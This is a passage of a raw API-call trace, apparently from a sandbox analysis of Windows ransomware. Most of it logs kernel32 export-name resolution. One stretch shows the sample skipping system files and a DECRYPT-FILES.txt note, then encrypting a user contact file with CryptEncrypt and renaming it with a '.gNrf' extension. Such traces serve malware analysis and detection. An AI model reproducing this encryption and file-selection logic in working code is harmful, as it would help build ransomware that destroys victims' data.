lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.734] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.734] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.734] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.734] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.734] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.734] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.734] lstrlenA (lpString="DELETEATOM") returned 10 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.734] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.734] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.734] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.734] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.734] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.735] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.735] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.735] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.735] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.735] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.735] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.735] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.735] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.735] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.735] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.735] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.735] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.735] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.735] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.735] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.735] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.735] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.735] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.735] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.736] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.736] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.736] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.736] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.736] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.736] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.736] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.736] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.736] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.736] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.736] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.736] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.736] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.736] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.736] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.736] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.736] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.736] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.736] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.737] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.737] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 60 [0082.737] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.gNrf") returned 65 [0082.737] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.gNrf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.gnrf"), dwFlags=0x0) returned 1 [0082.737] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.738] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.738] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.738] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="DECRYPT-FILES.txt") returned -1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="autorun.inf") returned 1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="boot.ini") returned 1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="desktop.ini") returned -1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntuser.dat") returned -1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="iconcache.db") returned -1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="bootsect.bak") returned 1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="ntuser.dat.log") returned -1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="thumbs.db") returned -1 [0082.738] lstrcmpiW (lpString1="chucu jadnvk.contact", lpString2="Bootfont.bin") returned 1 [0082.738] lstrlenW (lpString="chucu jadnvk.contact") returned 20 [0082.738] lstrcmpiW (lpString1="contact", lpString2="lnk") returned -1 [0082.738] lstrcmpiW (lpString1="contact", lpString2="exe") returned -1 [0082.738] lstrcmpiW (lpString1="contact", lpString2="sys") returned -1 [0082.738] lstrcmpiW (lpString1="contact", lpString2="dll") returned -1 [0082.738] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0082.739] lstrlenW (lpString="chucu jadnvk.contact") returned 20 [0082.739] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0082.739] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="chucu jadnvk.contact" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" [0082.740] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.741] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=1177) returned 1 [0082.741] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.741] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.742] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.742] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.742] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.742] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.742] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.743] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.743] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.743] CloseHandle (hObject=0x43c) returned 1 [0082.743] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.743] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.744] CloseHandle (hObject=0x0) returned 0 [0082.744] CloseHandle (hObject=0x438) returned 1 [0082.744] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.744] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.745] GetTickCount () returned 0x114d28c [0082.745] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.745] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.745] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.745] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.745] lstrlenA (lpString="kernel32.dll") returned 12 [0082.745] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.746] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.746] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.746] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.746] lstrlenA (lpString="ADDATOMA") returned 8 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.746] lstrlenA (lpString="ADDATOMW") returned 8 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.746] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.746] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.746] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.746] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.746] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.746] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.746] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.746] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.746] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.746] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.746] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.746] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.746] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.746] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.747] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.747] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.747] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.747] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.747] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.747] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.747] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.747] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.747] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.747] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.747] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.747] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.747] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.747] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.747] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.747] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.747] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.747] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.747] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.748] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.748] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.748] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.748] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.748] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.748] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.748] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.748] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.748] lstrcpyA (in: 